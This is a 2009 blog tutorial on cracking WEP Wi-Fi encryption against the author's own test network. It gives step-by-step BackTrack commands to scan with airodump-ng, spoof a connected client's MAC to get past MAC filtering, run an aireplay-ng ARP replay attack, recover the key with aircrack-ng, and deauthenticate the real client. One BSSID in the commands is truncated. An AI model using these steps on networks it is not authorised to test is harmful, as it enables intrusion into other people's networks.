Sunday 12 April 2009

Going wireless - Part 2 - WEP

In this example, my test victim setup is as follows;

* WEP encrypted network
* MAC filtering enabled
* Hidden SSID (SMC)
* Client connected to network

Tools used are all included on the BackTrack 3 live CD.
Will be using a wireless USB adapter from Linksys (WUSB54GC).

So after booting up into BackTrack, we open up a shell and prepare the wireless interface;
> iwconfig rausb0 rate 1M

Then start up airodump to scan for networks around.
As only interested in WEP networks I apply a filter to scan only for WEP networks.
> airodump-ng rausb0 -t WEP
After picking up 5 in under 2 minutes (?! really..) I see my victim network and apply filters in airodump to single it out;
> airodump-ng rausb0 -c 3 --bssid 00:13:D4:09:32:60

Even though the SSID is not being broadcast, airodump picks up the SSID as soon as there is activity from any clients already on the network or one connecting to the network.
In this case there is a client connected.

All the info necessary is there to start the WEP hacking process. Lets have at it !

Lets try to associate with the network.
> aireplay-ng -1 0 -a 00:13:D4:09:32:60 -e SMC rausb0

Drat, the above shows that MAC filtering is enabled, so we need a valid MAC address.
But we are in luck !
We saw above that there was a client connected, so we just 'steal' that MAC address ;

For me to get that to work when using the linksys adapter I need to stop it and start it ;
> modprobe -r rt73
> modprobe rt73
> ifconfig rausb0 down
> macchanger --mac 06:15:AF:B5:F7:79 rausb0
> ifconfig rausb0 up

Now we try to associate again;

Success !

Now we stop and restart airodump with an additional command to capture IVs and save to file which I will call SMC following the SSID, this filename can be anything you like;
> airodump-ng rausb0 -c 3 --bssid 00:13:D4:09:32:60 -w SMC --ivs

Then we start up aireplay again with an arp-replay attack, this will generate a mass of traffic which we can then use to crack the WEP key.

> aireplay-ng -3 -b 00:13:D4:09:32 rausb0

We now open up a new shell and start up aircrack;
> aircrack-ng -0 -b 00:13:D4:09:32:60 SMC-01*.ivs
After a few minutes ;

Success !

The above is based on some activity on the network, to get the arps running.

Connecting to the network is one thing, getting an IP address another..

But if the real client logs off, chances are you will be able to connect and do a dhcpcd to
get an IP address. Otherwise you will have to deauth the real client to allow yours to connect.

No comments:

Post a Comment

Google Analytics Alternative